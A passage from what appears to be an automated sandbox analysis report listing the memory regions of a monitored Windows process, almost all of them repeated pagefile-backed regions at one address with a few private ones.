"pagefile_0x0000000002880000" filename = "" Region: id = 12490 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12491 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12492 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12493 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12494 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12495 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12496 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12497 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12498 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12499 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12500 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12501 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12502 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12503 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12504 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12505 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12506 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12507 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12508 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 12509 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 12510 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12511 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12512 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12513 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12514 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12515 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12516 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12517 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12518 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12519 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12520 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12521 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12522 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12523 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12524 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12525 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12526 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12527 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12528 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12529 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12530 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12531 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12532 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12533 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12534 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12535 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12536 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12537 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12538 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12539 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12540 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12541 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12542 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12543 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12544 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12545 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12546 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12547 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12548 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12549 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12550 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12551 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12552 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12553 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12554 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12555 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12556 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12557 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12558 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12559 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12560 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12561 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12562 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12563 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12564 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12565 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12566 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12567 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12568 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12569 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12570 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12571 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12572 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12573 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12574 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12575 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12576 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12577 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12578 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12579 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12580 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12581 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12582 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12583 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12584 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12585 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12586 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12587 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12588 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12589 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12590 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12591 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12592 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12593 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12594 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12595 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12596 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12597 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12598 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12599 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12600 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12601 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12602 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12603 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12604 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12605 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12606 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12607 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12608 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12609 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12610 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12611 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12612 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12613 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12614 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12615 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12616 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12617 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 12618 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 12619 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12620 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12621 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12622 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12623 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12624 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12625 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12626 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12627 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12628 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12629 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12630 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12631 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12632 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12633 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12634 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12635 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12636 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12637 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12638 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12639 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12640 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12641 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12642 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12643 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12644 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12645 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12646 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12647 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12648 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12649 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12650 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12651 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12652 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12653 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12654 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12655 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12656 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12657 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12658 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12659 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12660 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12661 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12662 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12663 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12664 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12665 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12666 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12667 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12668 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12669 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12670 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12671 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12672 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12673 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12674 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12675 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12676 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 12677 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = 